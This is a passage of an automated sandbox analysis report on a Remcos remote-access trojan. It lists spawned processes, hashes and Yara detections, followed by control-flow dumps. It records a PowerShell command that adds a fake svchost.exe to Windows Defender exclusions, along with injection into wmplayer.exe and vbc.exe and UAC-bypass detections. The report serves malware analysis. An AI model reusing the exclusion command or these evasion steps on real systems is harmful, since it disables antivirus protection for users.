                                    MD5 hash:404E164E7C5F003A1AC5EC58CE77A534
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000018.00000002.1538118774.0000020A35606000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.1546946748.0000020A45615000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000018.00000002.1546946748.0000020A45615000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    Has exited:true

                                    Target ID:25
                                    Start time:17:55:44
                                    Start date:25/07/2024
                                    Path:C:\Windows\System32\WerFault.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\WerFault.exe -pss -s 552 -p 8048 -ip 8048
                                    Imagebase:0x7ff754570000
                                    File size:570'736 bytes
                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:26
                                    Start time:17:55:45
                                    Start date:25/07/2024
                                    Path:C:\Windows\System32\WerFault.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 8048 -s 1176
                                    Imagebase:0x7ff754570000
                                    File size:570'736 bytes
                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:27
                                    Start time:17:55:46
                                    Start date:25/07/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                                    Imagebase:0x7ff760310000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:28
                                    Start time:17:55:46
                                    Start date:25/07/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff70f010000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:29
                                    Start time:17:55:46
                                    Start date:25/07/2024
                                    Path:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
                                    Imagebase:0x2f0000
                                    File size:166'912 bytes
                                    MD5 hash:A7790328035BBFCF041A6D815F9C28DF
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001D.00000002.1493095561.0000000002E87000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001D.00000002.1492594141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001D.00000002.1492594141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001D.00000002.1492594141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000001D.00000002.1492594141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                    Has exited:true

                                    Target ID:30
                                    Start time:17:55:46
                                    Start date:25/07/2024
                                    Path:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                    Wow64 process (32bit):
                                    Commandline:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
                                    Imagebase:
                                    File size:166'912 bytes
                                    MD5 hash:A7790328035BBFCF041A6D815F9C28DF
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:31
                                    Start time:17:55:46
                                    Start date:25/07/2024
                                    Path:C:\Windows\System32\WerFault.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\WerFault.exe -pss -s 548 -p 1072 -ip 1072
                                    Imagebase:0x7ff754570000
                                    File size:570'736 bytes
                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:32
                                    Start time:17:55:46
                                    Start date:25/07/2024
                                    Path:C:\Windows\System32\WerFault.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 1072 -s 1424
                                    Imagebase:0x7ff754570000
                                    File size:570'736 bytes
                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:34
                                    Start time:17:55:49
                                    Start date:25/07/2024
                                    Path:C:\Windows\System32\WerFault.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\WerFault.exe -pss -s 548 -p 7964 -ip 7964
                                    Imagebase:0x7ff754570000
                                    File size:570'736 bytes
                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:35
                                    Start time:17:55:49
                                    Start date:25/07/2024
                                    Path:C:\Windows\System32\WerFault.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 7964 -s 1196
                                    Imagebase:0x7ff754570000
                                    File size:570'736 bytes
                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:39
                                    Start time:17:55:52
                                    Start date:25/07/2024
                                    Path:C:\Users\user\AppData\Roaming\svchost.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                    Imagebase:0x1c215440000
                                    File size:864'352 bytes
                                    MD5 hash:404E164E7C5F003A1AC5EC58CE77A534
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000027.00000002.1613047804.000001C217577000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000027.00000002.1623163422.000001C227275000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000027.00000002.1623163422.000001C227275000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    Has exited:true

                                    Target ID:40
                                    Start time:17:55:54
                                    Start date:25/07/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                                    Imagebase:0x7ff760310000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:41
                                    Start time:17:55:54
                                    Start date:25/07/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff70f010000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:42
                                    Start time:17:55:54
                                    Start date:25/07/2024
                                    Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                    Wow64 process (32bit):
                                    Commandline:"C:\Program Files (x86)\Internet Explorer\iexplore.exe"
                                    Imagebase:
                                    File size:828'368 bytes
                                    MD5 hash:6F0F06D6AB125A99E43335427066A4A1
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:43
                                    Start time:17:55:54
                                    Start date:25/07/2024
                                    Path:C:\Windows\regedit.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\regedit.exe"
                                    Imagebase:0x7ff6ef540000
                                    File size:370'176 bytes
                                    MD5 hash:999A30979F6195BF562068639FFC4426
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:44
                                    Start time:17:55:54
                                    Start date:25/07/2024
                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                    Imagebase:0x90000
                                    File size:2'625'616 bytes
                                    MD5 hash:0A7608DB01CAE07792CEA95E792AA866
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000002C.00000002.1577698674.0000000004E4B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    Has exited:true

                                    Target ID:45
                                    Start time:17:55:55
                                    Start date:25/07/2024
                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                    Wow64 process (32bit):
                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                    Imagebase:
                                    File size:2'625'616 bytes
                                    MD5 hash:0A7608DB01CAE07792CEA95E792AA866
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:46
                                    Start time:17:55:55
                                    Start date:25/07/2024
                                    Path:C:\Windows\System32\WerFault.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\WerFault.exe -pss -s 516 -p 7920 -ip 7920
                                    Imagebase:0x7ff754570000
                                    File size:570'736 bytes
                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:47
                                    Start time:17:55:55
                                    Start date:25/07/2024
                                    Path:C:\Windows\System32\WerFault.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 7920 -s 1128
                                    Imagebase:0x7ff754570000
                                    File size:570'736 bytes
                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:49
                                    Start time:17:56:16
                                    Start date:25/07/2024
                                    Path:C:\Windows\System32\svchost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                    Imagebase:0x7ff77afe0000
                                    File size:55'320 bytes
                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                    Has elevated privileges:true
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:11.1%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:3
                                      Total number of Limit Nodes:0
                                      execution_graph 16389 7ff887b14cd9 16390 7ff887b14ce7 VirtualProtect 16389->16390 16392 7ff887b14dae 16390->16392

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1367691470.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff887b10000_LisectAVT_2403002A_136.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 7r5$ 8r5$07r5$08r5$@7r5$@8r5$P7r5$P8r5$`7r5$`8r5$p7r5$p8r5$#CN_^$6r5$7r5$8r5$Zr5
                                      • API String ID: 0-3579847345
                                      • Opcode ID: 5f9dfb5b0d7541f8bd1cd8c7c256f50f08b28f25746f50b4ca84f45dda09cec8
                                      • Instruction ID: de0fddde2e51f685bb05695401a801d6226ca108f550519a36185f317b6ccb28
                                      • Opcode Fuzzy Hash: 5f9dfb5b0d7541f8bd1cd8c7c256f50f08b28f25746f50b4ca84f45dda09cec8
                                      • Instruction Fuzzy Hash: 9B42A451B2C9494FE759E66D54667B8B6E3FFA9390F9500FAE00DCB2E3DC186C418322
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1367691470.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff887b10000_LisectAVT_2403002A_136.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $r5$@r5$Hr5$Hr5$Hr5$Pr5$X:}$Xr5$Xr5$`r5$hr5$hr5$x6r5$x6r5
                                      • API String ID: 0-111077251
                                      • Opcode ID: 870faaf1d28b79203dff0e9348c0cc51fdb6ed33203aeca9bcafb9b3bd966308
                                      • Instruction ID: 8c393dd4b6575f07640627e2c9536dfe0ce1ca34fc6aa7100c03c2fb0c0a022e
                                      • Opcode Fuzzy Hash: 870faaf1d28b79203dff0e9348c0cc51fdb6ed33203aeca9bcafb9b3bd966308
                                      • Instruction Fuzzy Hash: 18B2E331A1DA498FEB98DB18C495ABC77F2FF59350F5400BAD04EC76A2DE28AC41CB41

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1347 7ff887b27760-7ff887b277c0 1351 7ff887b27831-7ff887b2783b 1347->1351 1352 7ff887b277c2-7ff887b277c4 1347->1352 1353 7ff887b2783d-7ff887b2783e 1351->1353 1354 7ff887b27840-7ff887b2784b 1352->1354 1355 7ff887b277c6 1352->1355 1353->1354 1362 7ff887b2784d-7ff887b27855 1354->1362 1356 7ff887b277c8-7ff887b277cc 1355->1356 1357 7ff887b2780c-7ff887b2780f 1355->1357 1356->1353 1361 7ff887b277ce-7ff887b277d1 1356->1361 1358 7ff887b2788b-7ff887b27897 1357->1358 1359 7ff887b27811 1357->1359 1366 7ff887b27898-7ff887b278a8 1358->1366 1364 7ff887b27813-7ff887b27817 1359->1364 1365 7ff887b27857-7ff887b2785d 1359->1365 1361->1362 1363 7ff887b277d3 1361->1363 1362->1365 1367 7ff887b27819-7ff887b2781c 1363->1367 1368 7ff887b277d5-7ff887b2780b 1363->1368 1364->1367 1371 7ff887b27888-7ff887b2788a 1364->1371 1369 7ff887b2785f-7ff887b27863 1365->1369 1370 7ff887b278ce-7ff887b278d7 1365->1370 1377 7ff887b278a9-7ff887b278b2 1366->1377 1367->1366 1373 7ff887b2781e 1367->1373 1368->1357 1380 7ff887b2787c-7ff887b27886 1368->1380 1369->1377 1378 7ff887b27864-7ff887b27869 1369->1378 1374 7ff887b278da-7ff887b278e8 1370->1374 1371->1358 1373->1378 1379 7ff887b27820-7ff887b2782f 1373->1379 1387 7ff887b278ea-7ff887b278fa 1374->1387 1383 7ff887b2792e 1377->1383 1384 7ff887b278b3 1377->1384 1378->1374 1381 7ff887b2786b-7ff887b2786e 1378->1381 1379->1351 1380->1371 1381->1387 1388 7ff887b27870 1381->1388 1390 7ff887b27930 1383->1390 1385 7ff887b27924-7ff887b2792d 1384->1385 1386 7ff887b278b4-7ff887b278b5 1384->1386 1385->1383 1391 7ff887b278b6-7ff887b278b7 1386->1391 1395 7ff887b2796b-7ff887b27974 1387->1395 1396 7ff887b278fc-7ff887b278fe 1387->1396 1388->1391 1392 7ff887b27872-7ff887b27879 1388->1392 1393 7ff887b27932 1390->1393 1394 7ff887b27967-7ff887b2796a 1390->1394 1397 7ff887b278b8 1391->1397 1398 7ff887b27933-7ff887b27938 1391->1398 1392->1380 1393->1398 1394->1395 1410 7ff887b27977 1395->1410 1400 7ff887b2797a-7ff887b2797f 1396->1400 1401 7ff887b278ff 1396->1401 1402 7ff887b27939-7ff887b2793e 1397->1402 1403 7ff887b278b9 1397->1403 1398->1402 1405 7ff887b27980-7ff887b27985 1400->1405 1401->1405 1406 7ff887b27900 1401->1406 1413 7ff887b279ba-7ff887b279bb 1402->1413 1414 7ff887b2793f 1402->1414 1403->1401 1409 7ff887b278ba-7ff887b278bf 1403->1409 1411 7ff887b27a01 1405->1411 1412 7ff887b27986 1405->1412 1407 7ff887b27901-7ff887b27906 1406->1407 1408 7ff887b27946-7ff887b2794b 1406->1408 1407->1410 1415 7ff887b27908-7ff887b2790b 1407->1415 1416 7ff887b2794d-7ff887b27950 1408->1416 1417 7ff887b279bc-7ff887b279be 1408->1417 1409->1390 1418 7ff887b278c1-7ff887b278c4 1409->1418 1419 7ff887b27979 1410->1419 1420 7ff887b279ae-7ff887b279b5 1410->1420 1421 7ff887b27a03-7ff887b27a05 1411->1421 1422 7ff887b279f7-7ff887b27a00 1412->1422 1423 7ff887b27987-7ff887b2798a 1412->1423 1413->1417 1424 7ff887b27940-7ff887b27943 1414->1424 1415->1423 1425 7ff887b2790c 1415->1425 1426 7ff887b279cc 1416->1426 1427 7ff887b27952 1416->1427 1429 7ff887b279bf-7ff887b279cb 1417->1429 1430 7ff887b279f5-7ff887b279f6 1417->1430 1418->1424 1428 7ff887b278c6 1418->1428 1419->1400 1420->1413 1431 7ff887b27a06-7ff887b27a0a 1421->1431 1422->1411 1423->1431 1432 7ff887b2798b 1423->1432 1424->1429 1433 7ff887b27945 1424->1433 1434 7ff887b2798d-7ff887b27992 1425->1434 1435 7ff887b2790d 1425->1435 1440 7ff887b27a48 1426->1440 1441 7ff887b279cd 1426->1441 1436 7ff887b27998 1427->1436 1437 7ff887b27953-7ff887b27963 1427->1437 1428->1425 1438 7ff887b278c8-7ff887b278cb 1428->1438 1429->1426 1430->1422 1443 7ff887b27a0c-7ff887b27a12 1431->1443 1432->1443 1444 7ff887b2798c 1432->1444 1433->1408 1433->1432 1434->1421 1446 7ff887b27994-7ff887b27997 1434->1446 1435->1437 1449 7ff887b2790e-7ff887b27923 1435->1449 1447 7ff887b27a19-7ff887b27a22 1436->1447 1448 7ff887b27999 1436->1448 1437->1394 1438->1370 1450 7ff887b27a4a 1440->1450 1451 7ff887b27a3e-7ff887b27a46 1441->1451 1452 7ff887b279ce-7ff887b279d1 1441->1452 1453 7ff887b27a13-7ff887b27a17 1443->1453 1444->1434 1445 7ff887b279d2 1444->1445 1459 7ff887b27a53-7ff887b27a57 1445->1459 1460 7ff887b279d3 1445->1460 1446->1436 1446->1453 1454 7ff887b27a3b-7ff887b27a3c 1447->1454 1455 7ff887b27a24-7ff887b27a25 1447->1455 1456 7ff887b2799a-7ff887b279aa 1448->1456 1457 7ff887b279df-7ff887b279e0 1448->1457 1449->1385 1458 7ff887b27a4d-7ff887b27a52 1450->1458 1452->1445 1452->1458 1453->1447 1454->1451 1461 7ff887b27a26-7ff887b27a31 1455->1461 1456->1420 1457->1461 1468 7ff887b279e1-7ff887b279f1 1457->1468 1458->1459 1469 7ff887b27a5a-7ff887b27aa7 call 7ff887b23b00 1459->1469 1460->1447 1464 7ff887b279d4-7ff887b279d9 1460->1464 1461->1454 1470 7ff887b27a33-7ff887b27a39 1461->1470 1464->1450 1466 7ff887b279db-7ff887b279de 1464->1466 1466->1457 1466->1469 1468->1430 1476 7ff887b27aac-7ff887b27ad5 1469->1476 1470->1454 1477 7ff887b27adb-7ff887b27b55 1476->1477 1478 7ff887b27bc0-7ff887b27bf8 call 7ff887b23b10 1476->1478 1477->1476 1485 7ff887b27bff-7ff887b27c13 call 7ff887b1a6b8 1478->1485 1487 7ff887b27c18-7ff887b27c29 1485->1487
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1367691470.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff887b10000_LisectAVT_2403002A_136.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 8r5$P$r5$pr5$r6y$x6r5$%r5
                                      • API String ID: 0-4014096015
                                      • Opcode ID: 57b230e26dcfbf17aad230823dce5cba257cbfe9304c9e40e56749708b655d9d
                                      • Instruction ID: 07ad37df8a69bd5dc35b500c3e943e18dde0609881e690a1548a9ec28cbf12eb
                                      • Opcode Fuzzy Hash: 57b230e26dcfbf17aad230823dce5cba257cbfe9304c9e40e56749708b655d9d
                                      • Instruction Fuzzy Hash: C0F15C31A2D94A4FE3ACD61C885657877E3FF99360B9C02BDD54DCB292DD18AC06C385

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1558 7ff887b16590-7ff887b18801 call 7ff887b182b0 1565 7ff887b18824-7ff887b18833 1558->1565 1566 7ff887b18803-7ff887b18819 call 7ff887b182b0 call 7ff887b18300 1565->1566 1567 7ff887b18835-7ff887b1884f call 7ff887b182b0 call 7ff887b18300 1565->1567 1576 7ff887b1881b-7ff887b18822 1566->1576 1577 7ff887b18850-7ff887b188a0 1566->1577 1576->1565 1580 7ff887b188ac-7ff887b188e3 1577->1580 1581 7ff887b188a2-7ff887b188a7 call 7ff887b17a58 1577->1581 1584 7ff887b188e9-7ff887b188f4 1580->1584 1585 7ff887b18adf-7ff887b18b49 1580->1585 1581->1580 1586 7ff887b18968-7ff887b1896d 1584->1586 1587 7ff887b188f6-7ff887b18904 1584->1587 1621 7ff887b18b4b-7ff887b18b51 1585->1621 1622 7ff887b18b66-7ff887b18b90 1585->1622 1590 7ff887b1896f-7ff887b1897b 1586->1590 1591 7ff887b189e0-7ff887b189ea 1586->1591 1587->1585 1589 7ff887b1890a-7ff887b18919 1587->1589 1596 7ff887b1891b-7ff887b1894b 1589->1596 1597 7ff887b1894d-7ff887b18958 1589->1597 1590->1585 1592 7ff887b18981-7ff887b18994 1590->1592 1594 7ff887b18a0c-7ff887b18a14 1591->1594 1595 7ff887b189ec-7ff887b189f9 call 7ff887b17a78 1591->1595 1598 7ff887b18a17-7ff887b18a22 1592->1598 1594->1598 1612 7ff887b189fe-7ff887b18a0a 1595->1612 1596->1597 1604 7ff887b18999-7ff887b1899c 1596->1604 1597->1585 1600 7ff887b1895e-7ff887b18966 1597->1600 1598->1585 1601 7ff887b18a28-7ff887b18a38 1598->1601 1600->1586 1600->1587 1601->1585 1607 7ff887b18a3e-7ff887b18a4b 1601->1607 1605 7ff887b1899e-7ff887b189ae 1604->1605 1606 7ff887b189b2-7ff887b189ba 1604->1606 1605->1606 1606->1585 1610 7ff887b189c0-7ff887b189df 1606->1610 1607->1585 1611 7ff887b18a51-7ff887b18a71 1607->1611 1611->1585 1617 7ff887b18a73-7ff887b18a82 1611->1617 1612->1594 1619 7ff887b18acd-7ff887b18ade 1617->1619 1620 7ff887b18a84-7ff887b18a8f 1617->1620 1620->1619 1629 7ff887b18a91-7ff887b18ac8 call 7ff887b17a78 1620->1629 1623 7ff887b18b91-7ff887b18be4 1621->1623 1624 7ff887b18b53-7ff887b18b64 1621->1624 1638 7ff887b18be7-7ff887b18bf7 1623->1638 1624->1621 1624->1622 1629->1619 1638->1638 1639 7ff887b18bf9-7ff887b18c31 1638->1639 1643 7ff887b18c88-7ff887b18c8f 1639->1643 1644 7ff887b18c33-7ff887b18c39 1639->1644 1645 7ff887b18c91-7ff887b18c92 1643->1645 1646 7ff887b18cd2-7ff887b18cfb 1643->1646 1644->1643 1647 7ff887b18c3b-7ff887b18c3c 1644->1647 1648 7ff887b18c95-7ff887b18c98 1645->1648 1649 7ff887b18c3f-7ff887b18c42 1647->1649 1650 7ff887b18c9a-7ff887b18cab 1648->1650 1651 7ff887b18cfc-7ff887b18d11 1648->1651 1649->1651 1653 7ff887b18c48-7ff887b18c55 1649->1653 1654 7ff887b18cc9-7ff887b18cd0 1650->1654 1655 7ff887b18cad-7ff887b18cb3 1650->1655 1662 7ff887b18d1b-7ff887b18da1 1651->1662 1663 7ff887b18d13-7ff887b18d1a 1651->1663 1656 7ff887b18c81-7ff887b18c86 1653->1656 1657 7ff887b18c57-7ff887b18c7e 1653->1657 1654->1646 1654->1648 1655->1651 1658 7ff887b18cb5-7ff887b18cc5 1655->1658 1656->1643 1656->1649 1657->1656 1658->1654 1663->1662
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1367691470.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff887b10000_LisectAVT_2403002A_136.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: b4y$b4y$b4y$d
                                      • API String ID: 0-3121683296
                                      • Opcode ID: ffd7d9427a29ecb877217873031fe4b8ee707e183cac35b5444e4145fc0f963a
                                      • Instruction ID: d68b7a9b8458d646329a6f3a0bfdffb5d2a5e296e729a58ff280434aed8b20ab
                                      • Opcode Fuzzy Hash: ffd7d9427a29ecb877217873031fe4b8ee707e183cac35b5444e4145fc0f963a
                                      • Instruction Fuzzy Hash: 76224330A5CA4A4FE349DB2894C15BA77E2FF55360B1802BDD49EC7197EE28E843C791
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1367691470.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff887b10000_LisectAVT_2403002A_136.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: x6r5$x6r5
                                      • API String ID: 0-805715783
                                      • Opcode ID: 960722a8db040c6035076fe6c0c6028a74dbca5c24c6f8daead449a4366bb68c
                                      • Instruction ID: 4be1f4e4c198f6d5608231924aabe4e9fd2d819130bebe1ee110024ca68e5d7a
                                      • Opcode Fuzzy Hash: 960722a8db040c6035076fe6c0c6028a74dbca5c24c6f8daead449a4366bb68c
                                      • Instruction Fuzzy Hash: 50F29B30A1DB494FE359DB28C4814B9B7F2FF95341B4446BED48AC72A6DE38E846C781
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1367691470.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff887b10000_LisectAVT_2403002A_136.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 6y$H:r5
                                      • API String ID: 0-2465931441
                                      • Opcode ID: bbafc8ef7730756428f451cc52afacad40a129fc66eafb3c18e6b6700ddbf034
                                      • Instruction ID: 9526b95e31e4e7ef3beaa6545ff08006e6d9ac48bce8a3ca8b87f280a087056e
                                      • Opcode Fuzzy Hash: bbafc8ef7730756428f451cc52afacad40a129fc66eafb3c18e6b6700ddbf034
                                      • Instruction Fuzzy Hash: F022E230A1DA098FDBA8EB28945567977F2FF59340B5401BEE45EC7292DE24EC42C741
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1367691470.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff887b10000_LisectAVT_2403002A_136.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X:}$fish
                                      • API String ID: 0-3610222906
                                      • Opcode ID: bd62c95278b8a1891756e15007e3594bacae5c97515e86828dd96c2ba5e0ba4a
                                      • Instruction ID: 65a4c5208de55fe7e8c86a142d731d276572aea83b0cc047ed0ca56ce6e61f95
                                      • Opcode Fuzzy Hash: bd62c95278b8a1891756e15007e3594bacae5c97515e86828dd96c2ba5e0ba4a
                                      • Instruction Fuzzy Hash: 0CD13831A5CA4A0FE75DEB2898655B973F2FF96350B0402BED48BC71D2DD28E802C791
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1367691470.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff887b10000_LisectAVT_2403002A_136.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 55c8bf59af8fb1ad5dbe3216f20ff03012681707b1ab353e486089b30118fd39
                                      • Instruction ID: e8d36f279d7122af0d6203b903b5f8c6cd26352c162633234f40f9554337fba1
